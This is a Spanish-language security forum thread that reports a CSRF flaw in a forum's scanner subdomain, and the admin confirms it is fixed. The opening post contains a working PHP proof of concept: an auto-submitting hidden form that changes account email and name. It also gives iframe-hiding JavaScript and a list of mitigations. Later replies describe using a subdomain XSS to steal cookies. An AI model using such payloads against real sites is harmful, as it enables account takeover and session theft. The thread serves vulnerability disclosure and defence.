comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[CSRF]Scanner Underc0de

  • 6 Respuestas
  • 2474 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Matabarras

  • *
  • Underc0der
  • Mensajes: 129
  • Actividad:
    0%
  • Reputación 0
  • In-Seguridad informática
    • Ver Perfil
  • Skype: Matabarrasfud
« en: Febrero 29, 2016, 10:37:00 am »
Url: scanner.underc0de.org

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
<?php
//Codded: Matabarras
$url "scanner.underc0de.org"//url
//Parametros post que modificaremos :D
$form["password"] = ""//Dejamos el valor así debido a por defecto ya coge el valor del pwd.
$form["email"] = "prueba@hotmail.es"//cambiamos el correo por el que queramos
$form["fname"] = "meaburro"//nombre
$form["lname"] = "vayavaya"//apellidos
$form["newsletter"] = 0//recibimos noticias 0 deshabilitado, 1 habilitado
$form["doupdate"] = "";
$form["processUser"] = 1;





echo 
'<html><body onLoad="document.csrf.submit();">';
echo 
'<form name="csrf" action="http://'.$url.'/ajax/controller.php" method="POST">';
foreach(
$form As $key=>$value) {
echo '<input type="hidden" name="'.$key.'" value="'.$value.'">';
}
echo 
'</form></body></html>';
?>


Camuflar el csrf, easy.

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
// This code was coded by FrenetikK & Matabarras.


function writeIf(url) {
document.write('<iframe src="'+url+'" frameborder="0" width="1" height="1" scrolling="no"></iframe>');
}

writeIf('http://127.0.0.1/csrf.php');

Index
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
<script src="a.js"></script>
Soluciones:

- Solución fácil desactivar que se tome por si la contraseña.
- Solución fácil utilizar un catpcha decente como recaptcha.
-Solución fácil utilizar un referer(esto aun así seria bypasseable).
-Solución correcta, utilizar un token para cada cuenta y para cada petición.

Reportado? Si
Fixeado? Si pero no adecuadamente.


No esperes nada, vive la vida, y que los demas hagan lo que ellos creen.

Desconectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1910
  • Actividad:
    20%
  • Reputación 15
    • Ver Perfil
« Respuesta #1 en: Marzo 01, 2016, 09:25:59 am »
Solucionada vulnerabilidad mediante aplicación de un token específico para cada cuenta y verificación de contraseña actual.

Reporte de @No tienes permisos para ver links. Registrate o Entra con tu cuenta Duplicado, reporte original por @No tienes permisos para ver links. Registrate o Entra con tu cuenta hace 2 semanas.

Gracias por reportar!

Saludos.
« Última modificación: Marzo 01, 2016, 09:30:48 am por blackdrake »



Desconectado Matabarras

  • *
  • Underc0der
  • Mensajes: 129
  • Actividad:
    0%
  • Reputación 0
  • In-Seguridad informática
    • Ver Perfil
  • Skype: Matabarrasfud
« Respuesta #2 en: Marzo 01, 2016, 05:06:39 pm »
Bueno si alguien reporto hace 2 semanas, no públicamente, deberian verlo arreglado ya hace, y también es mala idea tener los servicios como subdominios del propio foro peo cada cual sabra  ::)
No esperes nada, vive la vida, y que los demas hagan lo que ellos creen.

Desconectado nuclan

  • *
  • Underc0der
  • Mensajes: 22
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #3 en: Marzo 14, 2016, 01:24:45 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Bueno si alguien reporto hace 2 semanas, no públicamente, deberian verlo arreglado ya hace, y también es mala idea tener los servicios como subdominios del propio foro peo cada cual sabra  ::)

Mmm... mala porque? Ahí si que me pillas

Desconectado po6xsecpo

  • *
  • Underc0der
  • Mensajes: 45
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
  • Skype: po6xsecpo@gmail.com
« Respuesta #4 en: Marzo 14, 2016, 01:36:15 pm »
Cierto, Mago se jactaba mientras cantaba bachata(?)

Desconectado Matabarras

  • *
  • Underc0der
  • Mensajes: 129
  • Actividad:
    0%
  • Reputación 0
  • In-Seguridad informática
    • Ver Perfil
  • Skype: Matabarrasfud
« Respuesta #5 en: Marzo 15, 2016, 08:00:11 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Bueno si alguien reporto hace 2 semanas, no públicamente, deberian verlo arreglado ya hace, y también es mala idea tener los servicios como subdominios del propio foro peo cada cual sabra  ::)

Mmm... mala porque? Ahí si que me pillas
Basicamente como ya paso en más sitios donde reporte vulnerabilidades en ese caso fue una Cross site Scripting, gracias a una xss en un uploader , resumiendo  podia subir archivos con extensión inventada (.test) cuando accedias a ellos se ejecutaban como html, por lo tanto lo que hice fue redirigir el mismo sitio para robarle las cookies del DOMINIO, entonces obtenia la del foro smf , que era el dominio principal. Si el uploader no hubiera sido un subdominio, en ningun momento hubiera tenido acceso a las cookies del dominio principal que en este caso eran SMF.

Ahora me pillas tú?
No esperes nada, vive la vida, y que los demas hagan lo que ellos creen.

Desconectado nuclan

  • *
  • Underc0der
  • Mensajes: 22
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #6 en: Marzo 15, 2016, 08:33:48 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Bueno si alguien reporto hace 2 semanas, no públicamente, deberian verlo arreglado ya hace, y también es mala idea tener los servicios como subdominios del propio foro peo cada cual sabra  ::)

Mmm... mala porque? Ahí si que me pillas
Basicamente como ya paso en más sitios donde reporte vulnerabilidades en ese caso fue una Cross site Scripting, gracias a una xss en un uploader , resumiendo  podia subir archivos con extensión inventada (.test) cuando accedias a ellos se ejecutaban como html, por lo tanto lo que hice fue redirigir el mismo sitio para robarle las cookies del DOMINIO, entonces obtenia la del foro smf , que era el dominio principal. Si el uploader no hubiera sido un subdominio, en ningun momento hubiera tenido acceso a las cookies del dominio principal que en este caso eran SMF.

Ahora me pillas tú?
Si, ya pillo por donde ibas  :P en ese caso estando bajo el mismo dominio es cierto que puedes acceder a la cookie del dominio principal

 

¿Te gustó el post? COMPARTILO!



Sqli Android app por QR o Barcode Scanner

Iniciado por hdbreaker

Respuestas: 5
Vistas: 2747
Último mensaje Noviembre 18, 2013, 11:19:45 am
por Pr0ph3t
Seriously(?) [Effiliation.com + emailtemporal.org] CSRF,XSS,BYPASS..

Iniciado por Matabarras

Respuestas: 2
Vistas: 1758
Último mensaje Junio 25, 2016, 07:04:39 am
por blackdrake